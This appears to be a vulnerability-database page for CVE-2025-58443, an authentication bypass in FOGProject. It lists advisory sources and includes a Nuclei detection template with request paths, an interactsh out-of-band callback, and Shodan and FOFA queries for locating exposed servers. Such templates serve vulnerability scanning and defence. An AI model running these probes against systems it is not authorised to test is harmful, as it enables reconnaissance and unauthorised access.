| Reporter | Title | Published | Views | Family All 12 |
|---|---|---|---|---|
| Exploit for CVE-2025-58443 | 6 Sep 202502:36 | – | githubexploit | |
| CVE-2025-58443 | 6 Sep 202502:40 | – | circl | |
| FOG 访问控制错误漏洞 | 6 Sep 202500:00 | – | cnnvd | |
| CVE-2025-58443 | 6 Sep 202520:04 | – | cve | |
| CVE-2025-58443 FOG's authentication bypass leads to full SQL DB dump | 6 Sep 202520:04 | – | cvelist | |
| EUVD-2025-27087 | 3 Oct 202520:07 | – | euvd | |
| CVE-2025-58443 | 6 Sep 202520:15 | – | nvd | |
| CVE-2025-58443 FOG's authentication bypass leads to full SQL DB dump | 6 Sep 202520:04 | – | osv | |
| PT-2025-36400 | 6 Sep 202500:00 | – | ptsecurity | |
| CVE-2025-58443 | 6 Sep 202521:03 | – | redhatcve |
id: CVE-2025-58443
info:
name: FOGProject <= 1.5.10.1673 - Authentication Bypass
author: oleveloper
severity: critical
description: |
FOGProject version 1.5.10.1673 suffers from an authentication bypass vulnerability that allows unauthenticated users to access the management interface without proper authentication. This can lead to unauthorized access to system configuration, host management, and potentially database information.
impact: |
Unauthenticated attackers can bypass authentication to access the FOGProject management interface and retrieve sensitive system configuration and host management information.
remediation: |
Upgrade FOGProject to a version later than 1.5.10.1673 that implements proper authentication on all management endpoints.
reference:
- https://github.com/casp3r0x0/CVE-2025-58443
- https://nvd.nist.gov/vuln/detail/CVE-2025-58443
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
cvss-score: 9.1
cve-id: CVE-2025-58443
epss-score: 0.17647
epss-percentile: 0.96784
cwe-id: CWE-287
metadata:
max-request: 3
vendor: fogproject
product: fogproject
fofa-query: icon_hash="-1952619005"
shodan-query: http.favicon.hash:-1952619005
tags: cve,cve2025,fogproject,auth-bypass,vkev
flow: http(1) && http(2)
http:
- method: GET
path:
- "{{BaseURL}}"
redirects: true
matchers:
- type: dsl
dsl:
- "contains(body, 'FOG')"
- "status_code == 200"
condition: and
internal: true
- method: GET
path:
- "{{BaseURL}}/fog/management/index.php?node=about&sub=kernel"
- "{{BaseURL}}/fog/service/getversion.php?url={{interactsh-url}}"
matchers-condition: or
matchers:
- type: dsl
dsl:
- "status_code == 200"
- "contains(interactsh_protocol,'dns')"
condition: and
- type: dsl
dsl:
- "status_code == 200"
- "regex('(?is)FOG.*Configuration.*(?:Kernel|bzImage)', body)"
condition: and
# digest: 4b0a00483046022100d5c44cecda97230dc7a409abc4c04419b2207b5c9335122a6a434a471b116df0022100da0fa7a5085b712c7625645f94d9b16302a6d3be04b50635e4b5c79395c25066:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation